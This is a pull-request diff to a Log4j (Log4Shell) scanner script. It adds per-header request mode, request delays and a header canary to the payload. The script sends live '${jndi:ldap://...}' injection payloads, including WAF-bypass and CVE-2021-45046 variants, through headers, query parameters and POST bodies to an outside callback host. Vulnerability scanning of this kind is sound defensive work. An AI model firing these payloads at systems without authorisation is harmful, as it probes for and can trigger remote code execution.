Skip to content
This repository was archived by the owner on Dec 6, 2022. It is now read-only.
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
109 changes: 102 additions & 7 deletions log4-scanner/log4j-scan.py
Original file line number Diff line number Diff line change
Expand Up @@ -22,7 +22,11 @@
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from termcolor import cprint

# add datetime
#from datetime import datetime
from time import gmtime, strftime
from termcolor import colored
import re

# Disable SSL warnings
try:
Expand Down Expand Up @@ -108,6 +112,13 @@
dest="run_all_tests",
help="Run all available tests on each URL.",
action='store_true')
# Added "Individual" Requests
parser.add_argument("-i", "--individual",
dest="individual_request",
help="Run scan with individual Header requests - [Default: Batch all requests at once]",
#default='batch_request',
action='store_true')
# Added "All" Requests
parser.add_argument("--exclude-user-agent-fuzzing",
dest="exclude_user_agent_fuzzing",
help="Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.",
Expand All @@ -118,6 +129,13 @@
default=5,
type=int,
action='store')
# Added Sleep Time per request
parser.add_argument("--sleep-time",
dest="sleep_time",
help="Sleep time per Request (in seconds) - [Default: 1].",
default=1,
type=int,
action='store')
parser.add_argument("--waf-bypass",
dest="waf_bypass_payloads",
help="Extend scans with WAF bypass payloads.",
Expand All @@ -142,6 +160,11 @@
dest="disable_redirects",
help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have a higher chance of reaching vulnerable systems.",
action='store_true')
# Print Individual Header
parser.add_argument("--show-header",
dest="show_header",
help="Prints Request with Header and UTC Time information",
action='store_true')

args = parser.parse_args()

Expand All @@ -163,19 +186,25 @@ def get_fuzzing_headers(payload):
i = i.strip()
if i == "" or i.startswith("#"):
continue
fuzzing_headers.update({i: payload})
payload2=re.sub("HEADER",i,payload) # RegEx to replace HEADER with header value
#print("UPDATE FUZZING PAYLOAD: " + str(payload2))
fuzzing_headers.update({i: payload2})
if args.exclude_user_agent_fuzzing:
fuzzing_headers["User-Agent"] = default_headers["User-Agent"]

if "Referer" in fuzzing_headers:
fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'
return fuzzing_headers
#print(fuzzing_headers)


def get_fuzzing_post_data(payload):
fuzzing_post_data = {}
for i in post_data_parameters:
fuzzing_post_data.update({i: payload})
# RegEx to replace "HEADER" canary with the parameter name
update=re.sub("HEADER",i,payload)
#fuzzing_post_data.update({i: payload})
fuzzing_post_data.update({i:update})
return fuzzing_post_data


Expand Down Expand Up @@ -290,19 +319,23 @@ def parse_url(url):
def scan_url(url, callback_host):
parsed_url = parse_url(url)
random_string = ''.join(random.choice('0123456789abcdefghijklmnopqrstuvwxyz') for i in range(7))
payload = '${jndi:ldap://%s.%s/%s}' % (parsed_url["host"], callback_host, random_string)
# Updated Payload below with HEADER canary
payload = '${jndi:ldap://%s.HEADER.%s/%s}' % (parsed_url["host"], callback_host, random_string)
payloads = [payload]

if args.waf_bypass_payloads:
payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.HEADER.{callback_host}', random_string))

if args.cve_2021_45046:
cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)
payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.HEADER.{callback_host}', random_string)

for payload in payloads:
cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")

if args.request_type.upper() == "GET" or args.run_all_tests:
time.sleep(int(args.sleep_time))
#print("Running BATCH GET")
try:
requests.request(url=url,
method="GET",
Expand All @@ -313,9 +346,32 @@ def scan_url(url, callback_host):
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
cprint(f"EXCEPTION: {e}")


if args.individual_request and args.request_type.upper() == "GET" or args.run_all_tests:
#print("RUNNING INDIVIDUAL GET")
for i in get_fuzzing_headers(payload): # Added for loop to take out individual items from the dictionary
time.sleep(int(args.sleep_time))
# RegEx to replace "HEADER" with the Header being sent
newPayload = re.sub("HEADER",i,payload)
# Added Verbose feature based of --show-header
if args.show_header:
(print("Request: " + colored("GET", 'green') + " Header " + colored(i, 'green') + ' at ' + colored(str(strftime("%Y-%m-%d %H:%M:%S", gmtime())), 'green') + " UTC"))
try:
requests.request(url=url,
method="GET",
params={"v": newPayload},
headers={i: newPayload},
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")

if args.request_type.upper() == "POST" or args.run_all_tests:
#print("RUNNING BATCH POST")
try:
# Post body
requests.request(url=url,
Expand Down Expand Up @@ -344,6 +400,45 @@ def scan_url(url, callback_host):
except Exception as e:
cprint(f"EXCEPTION: {e}")

if args.individual_request and args.request_type.upper() == "POST" or args.run_all_tests:
#print("RUNNING INDIVIDUAL POST")
for i in get_fuzzing_headers(payload): # Added a for loop to take out individual items from the dictionary
# RegEx to replace "HEADER" with the Header being sent
newPayload = re.sub("HEADER",i,payload)
time.sleep(int(args.sleep_time))
# Added verbose based of --show-header
if args.show_header:
print("Request: " + colored("POST", 'green') + " Header " + colored(i, 'green') + ' at ' + colored(str(strftime("%Y-%m-%d %H:%M:%S", gmtime())), 'green') + " UTC")
try:
# Post body
requests.request(url=url,
method="POST",
params={"v": str(newPayload)},
headers={i:newPayload}, # Changed ti i:payload instead of get_fuzzing_headers(payload)
data=get_fuzzing_post_data(payload), # Need to fix?
#data=newPayload,
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")

try:
# JSON body
requests.request(url=url,
method="POST",
params={"v": newPayload},
headers={i:newPayload}, # Added i:payload
json=get_fuzzing_post_data(payload),
#json=newPayload,
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
proxies=proxies)
except Exception as e:
cprint(f"EXCEPTION: {e}")
#x = (x+1)

def main():
urls = []
Expand Down